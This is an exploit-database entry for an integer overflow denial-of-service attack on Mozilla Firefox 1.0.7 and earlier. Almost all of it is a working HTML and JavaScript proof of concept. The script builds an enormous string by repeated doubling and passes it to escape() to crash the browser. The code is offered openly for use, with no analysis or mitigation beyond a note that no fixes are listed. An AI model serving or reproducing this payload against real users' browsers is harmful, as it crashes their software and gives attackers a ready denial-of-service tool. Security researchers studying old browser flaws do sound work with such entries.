Mozilla Firefox <= 1.0.7 Integer Overflow Denial of Service Exploit

2005-09-26 00:00:00

<html>
Copyright Georgi Guninski
<br>
Cannot be used in vulnerability databases
<br>
Especially securityfocus/mitre/cve/cert
<script>
var s=String.fromCharCode(257);
var ki="";
var me="";
for(i=0;i<1024;i++)
{ki=ki+s;}
for(i=0;i<1024;i++)
{me=me+ki;}
var ov=s;
for(i=0;i<28;i++) ov += ov;
for(i=0;i<88;i++) ov += me;

alert("done generating");
var fuckbill=escape(ov);
alert("done escape");
alert(fuckbill);
</script>
</html>

#

Fixes

No fixes

In order to submit a new fix you need to be registered.